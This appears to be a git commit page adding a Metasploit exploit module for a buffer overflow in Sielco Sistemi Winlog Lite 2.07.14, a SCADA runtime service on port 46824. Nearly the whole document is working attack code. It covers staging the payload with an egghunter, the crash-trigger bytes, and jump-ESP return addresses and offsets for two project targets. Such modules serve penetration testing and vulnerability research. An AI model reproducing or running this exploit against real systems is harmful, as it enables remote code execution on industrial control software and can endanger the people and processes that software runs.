winlog_lite_2.07.14 initial commit

2012-06-04 17:24:01 +02:00 · 2012-06-04 17:24:01 +02:00 · 08ff6c72b1
parent 0759c3b75c
commit 08ff6c72b1
1 changed files with 102 additions and 0 deletions
--- a/modules/exploits/windows/scada/winlog_lite_2.07.14.rb
+++ b/modules/exploits/windows/scada/winlog_lite_2.07.14.rb
@ -0,0 +1,102 @@
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 #   http://metasploit.com/framework/
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 	include Msf::Exploit::Remote::Tcp
 	include Msf::Exploit::Remote::Egghunter
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'		=> 'Sielco Sistemi Winlog Buffer Overflow 2.07.14',
 			'Description'	=> %q{
  					This module exploits a buffer overflow in Sielco Sistem Winlog <=
 					2.07.14. When sending a specially formatted packet to the
 					Runtime.exe service on port 46824, an attacker may be able to execute arbitrary
 					code. The reliability depends on the actual project. We need to generate some more
 					targets. Two of them for the default project and one other project is now available.
 			},
 			'License'		=> MSF_LICENSE,
 			'Author'		=>
 				[
 					'm-1-k-3 <m1k3@s3cur1ty.de>',
 				],
 			'References'	=>
 				[
 					[ 'URL', 'http://www.s3cur1ty.de' ],
 					[ 'URL', 'http://www.sielcosistemi.com/en/download/public/winlog_lite.html' ]
 				],
 			'DefaultOptions' =>
 				{
 					'ExitFunction' => 'process', 
 				},
 			'Platform'	=> 'win',
 			'Payload'	=>
 				{
                                        'Space'    => 2000,
 					'BadChars' => "\x00",
 					'DisableNops' => true,
 				},
                        'Platform'       => 'win',
 			'Targets'		=>
 				[
 					[ 'Ceramics Kiln Project',
 						{
 							'Ret'   	=>	0x405153df,
 							'Offset'	=>	167,
 						}
 					], #  Jmp ESP - Vclx40.bpl - 0x405153df
 					[ 'Automatic Washing System Project',
 						{
 							'Ret'   	=>	0x405153df,
 							'Offset'	=>	151,
 						}
 					], #  Jmp ESP - Vclx40.bpl - 0x405153df
 				],
 			'Privileged'	=> false,
 			'DisclosureDate'	=> 'June 04 2012',
 			'DefaultTarget'	=> 0))
 		register_options([Opt::RPORT(46824)], self.class)
 	end
 	def exploit
 		connect
 		egghunter,egg = generate_egghunter(payload.encoded, payload_badchars)
 		print_status("placing the shellcode")
 		shellcode = rand_text_alpha(2000)
 		shellcode << egg
 		sock.put(shellcode)
 		print_status("sleeping ...")
 		sleep(5)
 		buffer = rand_text_alpha(20) 
 		buffer << "\x14" * 10 	#trigger the crash
 		buffer << rand_text_alpha(target['Offset'])
 		buffer << [target.ret].pack('V')
 		buffer << egghunter
 		buffer << rand_text_alpha(69 - egghunter.length)
 		print_status("Trying target #{target.name}...")
 		sock.put(buffer)
 		handler
 		disconnect
 	end
 end